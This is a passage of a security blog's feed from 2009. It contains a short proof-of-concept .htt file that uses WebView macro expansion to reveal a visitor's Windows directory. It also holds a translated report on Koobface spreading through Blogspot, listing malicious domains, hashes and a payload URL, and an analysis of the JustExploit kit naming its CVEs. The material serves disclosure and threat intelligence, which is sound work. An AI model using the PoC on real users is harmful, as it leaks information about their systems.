ARRAYSIZE(szKey));&lt;br /&gt; HKEY hkMacros;&lt;br /&gt; if (RegOpenKey(HKEY_CURRENT_USER, szKey, &amp;hkMacros) == ERROR_SUCCESS &amp;&amp; RegOpenKey(HKEY_LOCAL_MACHINE, szKey, &amp;hkMacros) == ERROR_SUCCESS) {&lt;br /&gt;  DWORD dwType;&lt;br /&gt;  DWORD cbData = SIZEOF(szExpansion);&lt;br /&gt;  SHQueryValueEx(hkMacros, NULL, NULL, &amp;dwType, (LPBYTE)szExpansion, &amp;cbData);&lt;br /&gt;  RegCloseKey(hkMacros);&lt;br /&gt; }&lt;br /&gt;&lt;br /&gt; ConvertTCharToBytes(szExpansion, nCharSize, pszExpansion, nBytes);&lt;br /&gt;}&lt;br /&gt;&lt;br /&gt;int CWebViewMimeFilter::_Expand(LPBYTE pszVar, LPBYTE * ppszExp) {&lt;br /&gt; if (!_StrCmp(pszVar, "TEMPLATEDIR", L"TEMPLATEDIR")) {&lt;br /&gt;  if (!_szTemplateDirPath[0]) {&lt;br /&gt;   GetMachineTemplateDir(_szTemplateDirPath, SIZEOF(_szTemplateDirPath), _nCharSize);&lt;br /&gt;  }&lt;br /&gt;&lt;br /&gt;  *ppszExp = _szTemplateDirPath;&lt;br /&gt;&lt;br /&gt; } else if (!_StrCmp(pszVar, "THISDIRPATH", L"THISDIRPATH")) {&lt;br /&gt;  if (!_szThisDirPath[0]) {&lt;br /&gt;   _QueryForDVCMDID(DVCMDID_GETTHISDIRPATH, _szThisDirPath, SIZEOF(_szThisDirPath));&lt;br /&gt;  }&lt;br /&gt;  *ppszExp = _szThisDirPath;&lt;br /&gt;&lt;br /&gt; } else if (!_StrCmp(pszVar, "THISDIRNAME", L"THISDIRNAME")) {&lt;br /&gt;  if (!_szThisDirName[0]) {&lt;br /&gt;   _QueryForDVCMDID(DVCMDID_GETTHISDIRNAME, _szThisDirName, SIZEOF(_szThisDirName));&lt;br /&gt;  }&lt;br /&gt;  *ppszExp = _szThisDirName;&lt;br /&gt;&lt;br /&gt; } else {&lt;br /&gt;  ExpandMacro(pszVar, _szExpansion, SIZEOF(_szExpansion), _nCharSize);&lt;br /&gt;  *ppszExp = _szExpansion;&lt;br /&gt; }&lt;br /&gt;&lt;br /&gt; return _StrLen(*ppszExp);&lt;br /&gt;}&lt;br /&gt;&lt;/pre&gt;&lt;br /&gt;In Windows XP the variables "%THISDIRPATH%" and "%THISDIRNAME%" were removed from the Mime Filter which means %TEMPLATEDIR%, %BACKGROUNDIMAGE% and %LOGOLINE% would still be translated into the current windows directory.&lt;br /&gt;&lt;br /&gt;The Proof Of Concept code (Remote WebView Macro Translation):&lt;br /&gt;Save on a remote host with an htt extension and replace "http:///filter_trap.htt&lt;br /&gt;--------------------------- filter_trap.htt start --------------------------------&lt;br /&gt;[div id="BACKGROUNDIMAGE"]%BACKGROUNDIMAGE%[/div]&lt;br /&gt;[div id="LOGOLINE"]%LOGOLINE%[/div]&lt;br /&gt;[div id="TEMPLATEDIR"]%TEMPLATEDIR%[/div]&lt;br /&gt;[script]&lt;br /&gt;alert(document.getElementById("BACKGROUNDIMAGE").innerHTML);&lt;br /&gt;alert(document.getElementById("LOGOLINE").innerHTML);&lt;br /&gt;alert(document.getElementById("TEMPLATEDIR").innerHTML);&lt;br /&gt;[/script]&lt;br /&gt;--------------------------- filter_trap.htt end --------------------------------&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6766263746795718144-5687983582489722670?l=evilfingers.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://evilfingers.blogspot.com/feeds/5687983582489722670/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=6766263746795718144&amp;postID=5687983582489722670' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6766263746795718144/posts/default/5687983582489722670'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6766263746795718144/posts/default/5687983582489722670'/><link rel='alternate' type='text/html' href='http://evilfingers.blogspot.com/2009/12/exploiting-webview-through-internet.html' title='Exploiting WebView through Internet Explorer to remotely discover windows directory'/><author><name>Rafel Ivgi</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='29' src='http://3.bp.blogspot.com/_18YBLFP2tdA/TPfxKzfydtI/AAAAAAAAAF0/o7KxzcR3Kx0/S220/rafel.png'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6766263746795718144.post-3239702895317642779</id><published>2009-12-01T16:12:00.000-11:00</published><updated>2009-12-01T16:13:25.186-11:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Jorge Mieres'/><category scheme='http://www.blogger.com/atom/ns#' term='Malware Intelligence'/><category scheme='http://www.blogger.com/atom/ns#' term='koobface'/><category scheme='http://www.blogger.com/atom/ns#' term='botnet'/><title type='text'>Koobface campaign spread through Blogspot</title><content type='html'>&lt;div style="text-align: justify;"&gt;&lt;span id="result_box" class="long_text"&gt;&lt;span style="background-color: rgb(255, 255, 255);" title="Una masiva campaña de propagación del gusano koobface se encuentra In-the-Wild utilizando como estrategia blogs generados desde el servicio Blogspot."&gt;A massive campaign to spread the worm is &lt;span style="font-weight: bold;"&gt;Koobface&lt;/span&gt; In-the-Wild using blogs as a strategy generated from the &lt;span style="font-weight: bold;"&gt;Blogspot&lt;/span&gt; service.&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;span id="result_box" class="long_text"&gt;&lt;span style="background-color: rgb(255, 255, 255);" title="Una masiva campaña de propagación del gusano koobface se encuentra In-the-Wild utilizando como estrategia blogs generados desde el servicio Blogspot."&gt;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;span id="result_box" class="long_text"&gt;&lt;span style="background-color: rgb(255, 255, 255);" title="Una masiva campaña de propagación del gusano koobface se encuentra In-the-Wild utilizando como estrategia blogs generados desde el servicio Blogspot."&gt;&lt;/span&gt;&lt;span style="background-color: rgb(255, 255, 255);" title="Koobface se ha transformado en una pesadilla para las redes sociales y si bien sus estrategias de propagación no cambian, este malware lleva casi dos años de actividad con una importante tasa de infección, constituyendo una de las botnets más importantes de la actualidad."&gt;Koobface has become a nightmare for social networks and even though its propagation strategies do not change, this malware is almost two years of activity with a significant rate of infection, making it one of the largest&lt;span style="font-weight: bold;"&gt; botnets&lt;/span&gt; today.&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;span id="result_box" class="long_text"&gt;&lt;span style="background-color: rgb(255, 255, 255);" title="Koobface se ha transformado en una pesadilla para las redes sociales y si bien sus estrategias de propagación no cambian, este malware lleva casi dos años de actividad con una importante tasa de infección, constituyendo una de las botnets más importantes de la actualidad."&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt; &lt;span id="result_box" class="long_text"&gt;&lt;span style="background-color: rgb(255, 255, 255);" title="Koobface se ha transformado en una pesadilla para las redes sociales y si bien sus estrategias de propagación no cambian, este malware lleva casi dos años de actividad con una importante tasa de infección, constituyendo una de las botnets más importantes de la actualidad."&gt;&lt;br /&gt;&lt;/span&gt;&lt;span style="background-color: rgb(255, 255, 255);" title="Los dominios de blogspot empleados como cobertura para la propagación son:"&gt;Blogspot domains used as cover for the spread are:&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="font-style: italic;"&gt;pannullonumair.blogspot.com&lt;/span&gt;&lt;span style="font-style: italic;"&gt;&lt;br /&gt;haladynalatosha.blogspot.com&lt;/span&gt;&lt;span style="font-style: italic;"&gt;&lt;br /&gt;macdougalmuskan.blogspot.com&lt;/span&gt;&lt;span style="font-style: italic;"&gt;&lt;br /&gt;mailletjamaica.blogspot.com&lt;/span&gt;&lt;span style="font-style: italic;"&gt;&lt;br /&gt;ledrewrooney.blogspot.com&lt;/span&gt;&lt;span style="font-style: italic;"&gt;&lt;br /&gt;brasenoktayoktay.blogspot.com&lt;/span&gt;&lt;span style="font-style: italic;"&gt;&lt;br /&gt;toludestany.blogspot.com&lt;/span&gt;&lt;span style="font-style: italic;"&gt;&lt;br /&gt;edgarbillison.blogspot.com&lt;/span&gt;&lt;span style="font-style: italic;"&gt;&lt;br /&gt;piotrowiczlyanne.blogspot.com&lt;/span&gt;&lt;span style="font-style: italic;"&gt;&lt;br /&gt;brochoiredeedee.blogspot.com&lt;/span&gt;&lt;span style="font-style: italic;"&gt;&lt;br /&gt;decuyperantohny.blogspot.com&lt;/span&gt;&lt;span style="font-style: italic;"&gt;&lt;br /&gt;derrenpassini.blogspot.com&lt;/span&gt;&lt;span style="font-style: italic;"&gt;&lt;br /&gt;elsenelsenumthun.blogspot.com&lt;/span&gt;&lt;span style="font-style: italic;"&gt;&lt;br /&gt;elsyelsysalah.blogspot.com&lt;/span&gt;&lt;span style="font-style: italic;"&gt;&lt;br /&gt;fanjonappuappu.blogspot.com&lt;/span&gt;&lt;span style="font-style: italic;"&gt;&lt;br /&gt;fredrikadantos.blogspot.com&lt;/span&gt;&lt;span style="font-style: italic;"&gt;&lt;br /&gt;genelleabril.blogspot.com&lt;/span&gt;&lt;span style="font-style: italic;"&gt;&lt;br /&gt;gilkerharjyot.blogspot.com&lt;/span&gt;&lt;span style="font-style: italic;"&gt;&lt;br /&gt;hadzilashawn.blogspot.com&lt;/span&gt;&lt;span style="font-style: italic;"&gt;&lt;br /&gt;insalacotecwyn.blogspot.com&lt;/span&gt;&lt;span style="font-style: italic;"&gt;&lt;br /&gt;janitasaels.blogspot.com&lt;/span&gt;&lt;span style="font-style: italic;"&gt;&lt;br /&gt;jodelinscheufler.blogspot.com&lt;/span&gt;&lt;span style="font-style: italic;"&gt;&lt;br /&gt;jones-allentammey.blogspot.com&lt;/span&gt;&lt;span style="font-style: italic;"&gt;&lt;br /&gt;jurgisbooty.blogspot.com&lt;/span&gt;&lt;span style="font-style: italic;"&gt;&lt;br /&gt;karanjeetisoardi.blogspot.com&lt;/span&gt;&lt;span style="font-style: italic;"&gt;&lt;br /&gt;dralleboyeboye.blogspot.com&lt;/span&gt;&lt;span style="font-style: italic;"&gt;&lt;br /&gt;maidenhermann.blogspot.com&lt;/span&gt;&lt;span style="font-style: italic;"&gt;&lt;br /&gt;messer-bustamantetimpriss.blogspot.com&lt;/span&gt;&lt;span style="font-style: italic;"&gt;&lt;br /&gt;murachaniananoushka.blogspot.com&lt;/span&gt;&lt;span style="font-style: italic;"&gt;&lt;br /&gt;nevnevsculthorpe.blogspot.com&lt;/span&gt;&lt;span style="font-style: italic;"&gt;&lt;br /&gt;parrisvistisen.blogspot.com&lt;/span&gt;&lt;span style="font-style: italic;"&gt;&lt;br /&gt;porierkunlekunle.blogspot.com&lt;/span&gt;&lt;span style="font-style: italic;"&gt;&lt;br /&gt;rotermundraimon.blogspot.com&lt;/span&gt;&lt;span style="font-style: italic;"&gt;&lt;br /&gt;sharonyacorvil.blogspot.com&lt;/span&gt;&lt;span style="font-style: italic;"&gt;&lt;br /&gt;sodorabardan.blogspot.com&lt;/span&gt;&lt;span style="font-style: italic;"&gt;&lt;br /&gt;tendaiblunk.blogspot.com&lt;/span&gt;&lt;span style="font-style: italic;"&gt;&lt;br /&gt;turskeybrianna.blogspot.com&lt;/span&gt;&lt;span style="font-style: italic;"&gt;&lt;br /&gt;zhuochengbate-pelletier.blogspot.com&lt;/span&gt;&lt;span style="font-style: italic;"&gt;&lt;br /&gt;ziziziziboyter.blogspot.com&lt;br /&gt;&lt;br /&gt;&lt;/span&gt; &lt;div style="text-align: justify;"&gt;&lt;span id="result_box" class="medium_text"&gt;&lt;span style="background-color: rgb(255, 255, 255);" title="Quien accede a alguno de estos dominios es redireccionado a una página que simula la típica pantalla de YouTube."&gt;Who accesses one of these domains redirected to a page that simulates the typical YouTube screen. &lt;/span&gt;&lt;span style="background-color: rgb(255, 255, 255);" title="A continuación vemos una captura."&gt;We then see a catch.&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;span id="result_box" class="medium_text"&gt;&lt;span style="background-color: rgb(255, 255, 255);" title="A continuación vemos una captura."&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt; &lt;span id="result_box" class="medium_text"&gt;&lt;span style="background-color: rgb(255, 255, 255);" title="A continuación vemos una captura."&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt; &lt;div style="text-align: justify;"&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://4.bp.blogspot.com/_Ppq0fEGkHo4/SxXX6VqPV0I/AAAAAAAAB_A/TfimsRZTbDI/s1600-h/mipistus-koobface.png"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 400px; height: 255px;" src="http://4.bp.blogspot.com/_Ppq0fEGkHo4/SxXX6VqPV0I/AAAAAAAAB_A/TfimsRZTbDI/s400/mipistus-koobface.png" alt="" id="BLOGGER_PHOTO_ID_5410467924602214210" border="0" /&gt;&lt;/a&gt;&lt;span id="result_box" class="medium_text"&gt;&lt;span style="background-color: rgb(255, 255, 255);" title="A continuación vemos una captura."&gt;&lt;/span&gt;&lt;/span&gt;&lt;span id="result_box" class="long_text"&gt;&lt;span style="background-color: rgb(255, 255, 255);" title="Inmediatamente después, se intenta descargar un binario llamado &amp;quot;setup.exe&amp;quot; (md5 6d8ac41c64137c91939cced16cb5f2fe) que posee una tasa de detección media baja."&gt;Immediately after, try to download a binary called "setup.exe" (md5 6d8ac41c64137c91939cced16cb5f2fe) which has &lt;a style="color: rgb(51, 51, 255);" href="http://www.virustotal.com/analisis/e78a19eb0b4cb6397115e42bb1f0ae15c7954349c56b8b1f0d34009b9bdf68b2-1259719233"&gt;a low average detection rate&lt;/a&gt;. &lt;/span&gt;&lt;span style="background-color: rgb(255, 255, 255);" title="Este binario, a su vez se encarga de descargar y ejecutar otros códigos maliciosos."&gt;This binary, in turn takes care of downloading and executing other malicious code.&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;/div&gt; &lt;span id="result_box" class="medium_text"&gt;&lt;span style="background-color: rgb(255, 255, 255);" title="A continuación vemos una captura."&gt;&lt;/span&gt;&lt;/span&gt; &lt;ul&gt;&lt;li&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://4.bp.blogspot.com/_Ppq0fEGkHo4/SxXYCFecBFI/AAAAAAAAB_I/0uoWmqaLlL8/s1600-h/pcap.png"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 400px; height: 213px;" src="http://4.bp.blogspot.com/_Ppq0fEGkHo4/SxXYCFecBFI/AAAAAAAAB_I/0uoWmqaLlL8/s400/pcap.png" alt="" id="BLOGGER_PHOTO_ID_5410468057696699474" border="0" /&gt;&lt;/a&gt;&lt;a style="color: rgb(51, 51, 255);" href="http://www.virustotal.com/analisis/ba64acc4cf822561f3fe125a5ff013ea3039b0527b3528aa7f611dd5da1f9dc5-1259670205"&gt;v2prx.exe&lt;/a&gt; (&lt;span style="font-weight: bold;"&gt;&lt;span style="color: rgb(255, 0, 0);"&gt;36&lt;/span&gt;/41 - 87.80%&lt;/span&gt;)&lt;/li&gt;&lt;li&gt;&lt;a style="color: rgb(51, 51, 255);" href="http://www.virustotal.com/analisis/487bc5ebc08e80f9f4cda7c2766c873494cf3d6e1c8ae255b7faf8ae3676fc7b-1259678303"&gt;go.exe&lt;/a&gt; (&lt;span style="font-weight: bold;"&gt;&lt;span style="color: rgb(255, 0, 0);"&gt;7&lt;/span&gt;/41 - 17.07%&lt;/span&gt;)&lt;/li&gt;&lt;li&gt;&lt;a style="color: rgb(51, 51, 255);" href="http://www.virustotal.com/analisis/67f0f171b2b24f0c4aa3e4ddd0c0deb0f7545a12dc41129ea3224ad6ff883264-1259700232"&gt;fb.75.exe&lt;/a&gt; (&lt;span style="font-weight: bold;"&gt;&lt;span style="color: rgb(255, 0, 0);"&gt;22&lt;/span&gt;/41 - 53.66%&lt;/span&gt;)&lt;/li&gt;&lt;li&gt;&lt;a style="color: rgb(51, 51, 255);" href="http://www.virustotal.com/analisis/a558f206de11bdf1384e84ddb4f81f70b698bc2ea6552254d34c41b8b1f16972-1259588965"&gt;v2newblogger.exe&lt;/a&gt; (&lt;span style="font-weight: bold;"&gt;&lt;span style="color: rgb(255, 0, 0);"&gt;36&lt;/span&gt;/41 - 87.80%&lt;/span&gt;)&lt;/li&gt;&lt;li&gt;&lt;a style="color: rgb(51, 51, 255);" href="http://www.virustotal.com/analisis/182b39100706212fad3a7a4399c3a6156595965ad4eb95e3c06e34fbc442cd83-1259447422"&gt;v2captcha.exe&lt;/a&gt; (&lt;span style="font-weight: bold;"&gt;&lt;span style="color: rgb(255, 0, 0);"&gt;39&lt;/span&gt;/41 - 95.12%&lt;/span&gt;)&lt;/li&gt;&lt;li&gt;&lt;a style="color: rgb(51, 51, 255);" href="http://www.virustotal.com/analisis/04fa663ae64c87a2fd27c798ebe418a562a5f25f16b21a517310b4aaaa499e6c-1259670384"&gt;v2googlecheck.exe&lt;/a&gt; (&lt;span style="font-weight: bold;"&gt;&lt;span style="color: rgb(255, 0, 0);"&gt;40&lt;/span&gt;/41 - 97.56%&lt;/span&gt;)&lt;/li&gt;&lt;/ul&gt; &lt;span id="result_box" class="short_text"&gt;&lt;span style="background-color: rgb(255, 255, 255);" title="Cada uno de estos archivos son descargados desde dominios del estilo"&gt;Each of these files are downloaded from domains Style &lt;/span&gt;&lt;/span&gt;"&lt;span style="font-style: italic;"&gt;homemadesandwiches.com/.sys/?getexe=ff2ie.exe&lt;/span&gt;".&lt;br /&gt;&lt;br /&gt;&lt;div style="text-align: justify;"&gt;&lt;span id="result_box" class="long_text"&gt;&lt;span style="background-color: rgb(255, 255, 255);" title="El binario v2captcha.exe se encarga de romper el captcha que solicita blogspot para el registro de blogs, creando de manera aleatoria y masiva los mismos, y redireccionando luego a la descarga de koobface a través de, como lo mencioné en un principio, una falsa"&gt;The binary v2captcha.exe handles breaking the captcha that asks for registration blogspot blogs, creating massive randomly and the same, and then redirected to the download of Koobface through, as I mentioned at the beginning, a false &lt;/span&gt;&lt;span style="background-color: rgb(255, 255, 255);" title="página de YouTube que utiliza la misma estrategia de ingeniería social visual utilizada en otras campañas de propagación similares."&gt;YouTube page that uses the same visual social engineering approach used in other campaigns similar spread.&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;span id="result_box" class="long_text"&gt;&lt;span style="background-color: rgb(255, 255, 255);" title="página de YouTube que utiliza la misma estrategia de ingeniería social visual utilizada en otras campañas de propagación similares."&gt;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;span id="result_box" class="long_text"&gt;&lt;span style="background-color: rgb(255, 255, 255);" title="página de YouTube que utiliza la misma estrategia de ingeniería social visual utilizada en otras campañas de propagación similares."&gt;&lt;/span&gt;&lt;span style="background-color: rgb(255, 255, 255);" title="Sin lugar a dudas koobface es otro de los códigos maliciosos que se vale de la persistencia a pesar de que muchas de sus variantes son detectadas por la mayoría de las compañías antivirus."&gt;Undoubtedly Koobface is another malicious code that uses persistence despite many of its variants are detected by most antivirus companies.&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;span id="result_box" class="long_text"&gt;&lt;span style="background-color: rgb(255, 255, 255);" title="Sin lugar a dudas koobface es otro de los códigos maliciosos que se vale de la persistencia a pesar de que muchas de sus variantes son detectadas por la mayoría de las compañías antivirus."&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt; &lt;span id="result_box" class="long_text"&gt;&lt;span style="background-color: rgb(255, 255, 255);" title="Sin lugar a dudas koobface es otro de los códigos maliciosos que se vale de la persistencia a pesar de que muchas de sus variantes son detectadas por la mayoría de las compañías antivirus."&gt;&lt;br /&gt;&lt;/span&gt;&lt;span style="background-color: rgb(255, 255, 255);" title="Información relacionada"&gt;&lt;span style="font-weight: bold;"&gt;Related information&lt;/span&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;a href="http://malwareint.blogspot.com/2009/06/symbiosis-malware-present-koobface.html"&gt;Symbiosis malware present. Koobface&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;Jorge Mieres&lt;br /&gt;Pistus Malware Intelligence&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6766263746795718144-3239702895317642779?l=evilfingers.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://evilfingers.blogspot.com/feeds/3239702895317642779/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=6766263746795718144&amp;postID=3239702895317642779' title='1 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6766263746795718144/posts/default/3239702895317642779'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6766263746795718144/posts/default/3239702895317642779'/><link rel='alternate' type='text/html' href='http://evilfingers.blogspot.com/2009/12/koobface-campaign-spread-through.html' title='Koobface campaign spread through Blogspot'/><author><name>Jorge Mieres</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://4.bp.blogspot.com/_Ppq0fEGkHo4/SxXX6VqPV0I/AAAAAAAAB_A/TfimsRZTbDI/s72-c/mipistus-koobface.png' height='72' width='72'/><thr:total>1</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6766263746795718144.post-4898930281775301345</id><published>2009-12-01T07:15:00.003-11:00</published><updated>2009-12-01T07:20:40.487-11:00</updated><title type='text'>Avatar - The Movie - HD Trailer 1080p</title><content type='html'>&lt;object width="420" height="340"&gt;&lt;param name="movie" value="http://www.youtube.com/v/cRdxXPV9GNQ&amp;hl=en_US&amp;fs=1&amp;"&gt;&lt;/param&gt;&lt;param name="allowFullScreen" value="true"&gt;&lt;/param&gt;&lt;param name="allowscriptaccess" value="always"&gt;&lt;/param&gt;&lt;embed src="http://www.youtube.com/v/cRdxXPV9GNQ&amp;hl=en_US&amp;fs=1&amp;" type="application/x-shockwave-flash" allowscriptaccess="always" allowfullscreen="true" width="420" height="340"&gt;&lt;/embed&gt;&lt;/object&gt;&lt;br /&gt;&lt;br /&gt;This seems to be like a very nice and well made movie. Looking at the trailer, I thought that I should share it with our blog viewers.&lt;br /&gt;&lt;br /&gt;Enjoy the Trailer! Copyrights Reserved to the Movie Makers!&lt;br /&gt;&lt;br /&gt;EF&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6766263746795718144-4898930281775301345?l=evilfingers.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://evilfingers.blogspot.com/feeds/4898930281775301345/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=6766263746795718144&amp;postID=4898930281775301345' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6766263746795718144/posts/default/4898930281775301345'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6766263746795718144/posts/default/4898930281775301345'/><link rel='alternate' type='text/html' href='http://evilfingers.blogspot.com/2009/12/avatar-movie-hd-trailer-1080p.html' title='Avatar - The Movie - HD Trailer 1080p'/><author><name>Anushree</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6766263746795718144.post-7429120586945618757</id><published>2009-11-29T13:51:00.000-11:00</published><updated>2009-11-29T13:52:37.091-11:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Jorge Mieres'/><category scheme='http://www.blogger.com/atom/ns#' term='Malware Intelligence'/><category scheme='http://www.blogger.com/atom/ns#' term='Crimeware'/><category scheme='http://www.blogger.com/atom/ns#' term='botnet'/><title type='text'>JustExploit. New Exploit kit that uses vulnerabilities in Java</title><content type='html'>&lt;div style="text-align: justify;"&gt;&lt;div style="text-align: justify;"&gt;&lt;span id="result_box" class="long_text"&gt;&lt;span style="background-color: rgb(255, 255, 255);" title="En esta oportunidad, la propuesta se llama JustExploit."&gt;&lt;a style="color: rgb(51, 51, 255);" href="http://mipistus.blogspot.com/2009/08/los-precios-del-crimeware-ruso-parte-2.html"&gt;Crimeware industry&lt;/a&gt; still rising, and just as &lt;a style="color: rgb(51, 51, 255);" href="http://mipistus.blogspot.com/2009/06/comercio-ruso-de-versiones-privadas-de.html"&gt;illegal marketing&lt;/a&gt; of web applications that seek to &lt;a style="color: rgb(51, 51, 255);" href="http://mipistus.blogspot.com/2009/07/automatizacion-de-procesos-anti.html"&gt;automate the process of infection&lt;/a&gt; through the &lt;a style="color: rgb(51, 51, 255);" href="http://mipistus.blogspot.com/2009/07/automatizacion-de-procesos-anti.html"&gt;exploitation of vulnerabilities&lt;/a&gt;.&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span id="result_box" class="long_text"&gt;&lt;span style="background-color: rgb(255, 255, 255);" title="En esta oportunidad, la propuesta se llama JustExploit."&gt;This time, the proposal called &lt;span style="font-weight: bold;"&gt;JustExploit&lt;/span&gt;. &lt;/span&gt;&lt;span style="background-color: rgb(255, 255, 255);" title="Se trata de un nuevo Exploit Pack de origen ruso que posee un condimento que cada vez está siendo tenido en cuenta con mayor fuerza entre los desarrolladores de crimeware: la explotación de vulnerabilidades en Java."&gt;This is a new &lt;span style="font-weight: bold;"&gt;Exploit Pack&lt;/span&gt; of Russian origin who has a seasoning that is increasingly being taken into account most heavily &lt;span style="font-weight: bold;"&gt;crimeware&lt;/span&gt; developers: the &lt;span style="font-style: italic;"&gt;exploitation of vulnerabilities in Java&lt;/span&gt;. &lt;/span&gt;&lt;span style="background-color: rgb(255, 255, 255);" title="Es decir, además de explotar las vulnerabilidades conocidas para MDAC y archivos PDF, explota Java en todos aquellos equipos que tengan instalado su runtime."&gt;That is, in addition to exploit known vulnerabilities for &lt;span style="font-weight: bold;"&gt;MDAC&lt;/span&gt; and &lt;span style="font-weight: bold;"&gt;PDF&lt;/span&gt; files, exploits &lt;span style="font-weight: bold;"&gt;Java&lt;/span&gt; in all those computers that have installed the runtime.&lt;/span&gt;&lt;/span&gt;&lt;/div&gt; &lt;/div&gt;&lt;br /&gt;&lt;div style="text-align: justify;"&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://3.bp.blogspot.com/_Ppq0fEGkHo4/SxMO_UvIAqI/AAAAAAAAB-w/L8oZDgwpDYg/s1600/mipistus-justexploit.png"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 400px; height: 283px;" src="http://3.bp.blogspot.com/_Ppq0fEGkHo4/SxMO_UvIAqI/AAAAAAAAB-w/L8oZDgwpDYg/s400/mipistus-justexploit.png" alt="" id="BLOGGER_PHOTO_ID_5409684058463011490" border="0" /&gt;&lt;/a&gt;The catch statistics for the module (&lt;span style="font-weight: bold;"&gt;Intelligence&lt;/span&gt;) which clearly shows that from this application you are controlling a large number of computers using different browsers and different operating systems, among which is the famous &lt;span style="font-style: italic;"&gt;Windows Seven&lt;/span&gt;.&lt;br /&gt;&lt;br /&gt;Another interesting fact which emerges from this module is the high rate of effectiveness which has the exploitation of the vulnerability in Java, with even a greater success rate with respect to two other vulnerabilities (MDAC and PDF).&lt;br /&gt;&lt;br /&gt;Through a file "&lt;span style="font-weight: bold;"&gt;index.php&lt;/span&gt;" script that has a dull, &lt;span style="font-weight: bold;"&gt;JustExploit&lt;/span&gt; try to run three exploits for vulnerabilities &lt;a style="color: rgb(51, 51, 255);" href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=2008-2992"&gt;CVE-2008-2992&lt;/a&gt;, &lt;a style="color: rgb(51, 51, 255);" href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0927"&gt;CVE-2009-0927&lt;/a&gt; and &lt;a style="color: rgb(51, 51, 255);" href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-5353"&gt;CVE-2008-5353&lt;/a&gt;. Here we see part of the script.&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;div style="text-align: justify;"&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://4.bp.blogspot.com/_Ppq0fEGkHo4/SxMPDu10KrI/AAAAAAAAB-4/dmD8olv5K38/s1600/mipistus-justexploit-script.png"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 400px; height: 145px;" src="http://4.bp.blogspot.com/_Ppq0fEGkHo4/SxMPDu10KrI/AAAAAAAAB-4/dmD8olv5K38/s400/mipistus-justexploit-script.png" alt="" id="BLOGGER_PHOTO_ID_5409684134189869746" border="0" /&gt;&lt;/a&gt;Among the files that are downloaded, is the operator of Java, called "&lt;span style="font-weight: bold;"&gt;sdfg.jar&lt;/span&gt;", with a low detection rate. According to VirusTotal, only &lt;a href="http://www.virustotal.com/analisis/eb4f3bd460824c701f3a99463a16e4307f5a4c111f1dc610d26db82d6436f842-1259429151"&gt;15 of 41 antivirus engines&lt;/a&gt;.&lt;br /&gt;&lt;br /&gt;In addition, the kit includes the following downloading malicious files (which for the moment, also have a very poor detection rate):&lt;br /&gt;&lt;/div&gt; &lt;ul&gt;&lt;li&gt;&lt;a style="color: rgb(51, 51, 255);" 